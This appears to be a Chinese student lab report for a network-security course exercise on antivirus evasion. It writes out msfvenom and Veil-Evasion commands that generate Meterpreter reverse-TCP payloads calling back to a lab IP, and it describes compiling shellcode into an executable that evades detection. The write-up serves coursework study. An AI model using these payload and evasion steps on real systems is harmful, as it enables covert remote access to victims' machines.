20155217《網絡對抗》Exp03 免殺原理與實踐
阿新 • • 發佈:2018-04-07
pre 使用 程序 use cnblogs 多次 scan www. 變化
20155217《網絡對抗》Exp03 免殺原理與實踐
實踐內容
- 正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧。
- 通過組合應用各種技術實現惡意代碼免殺(如果成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖)。
- 用另一電腦實測,在殺軟開啟的情況下,可運行並回連成功,註明電腦的殺軟名稱與版本。
正確使用msf編碼器,msfvenom生成如jar之類的其他文件,veil-evasion,自己利用shellcode編程等免殺工具或技巧
- 首先先把上次的後門放在virscan.org上檢測一下(有些需要重命名才能檢測)。
- 發現查殺率還是比較高的。
- 嘗試使用msf進行多次編碼,但發現編碼次數再多,也沒什麽實質性的變化,均不能實現免殺。
- 生成jar
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.199.137 lport=5217 x> ydshell.jar
- 下載並安裝
veil-evasion
。這個過程出現的各種錯誤讓人崩潰= =,這裏推薦安裝教程和使用教程!是親親杜可欣同學推薦的,用過的人都說好!
- 打開
tools/Veil/
,運行Veil.py
成功。
- veil啟動後,依次輸入:
use python/meterpreter/rev_tcp
set LHOST 192.168.199.137
generate
- Please enter the base name for output files (default is ‘payload‘):
veil5217
- 選擇
1
- 發現並不能生成Python語言的可執行文件QAQ。
- 於是和很多同學一樣,換了一個語言
use c/meterpreter/rev_tcp.py
,重復上面的操作,發現很是ok,可以生成可執行文件啦。
- 把Veil生成的小程序放在Win10下,被馬上發現了= =。
- 再把它放在網站上掃描一下,結果...唉。
利用shellcode編程實現免殺
- 首先關閉win10防火墻和殺毒軟件,ping通,可以回連成功。
- 使用
msf
生成一個C語言格式的shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.137 LPORT=5217 -f
- 嘗試使用交叉編譯,但結果無法運行。
- 在win10中下載VS並安裝,選擇
桌面C++
開發,繼續安裝。 - 把shellcode寫成
c文件
,編譯生成的exe文件
存放在Debug
文件夾裏。
- 嘗試回連,成功。
- 生成的exe文件放在網站上檢測一下(竟然只是警惕而已哎)。
20155217《網絡對抗》Exp03 免殺原理與實踐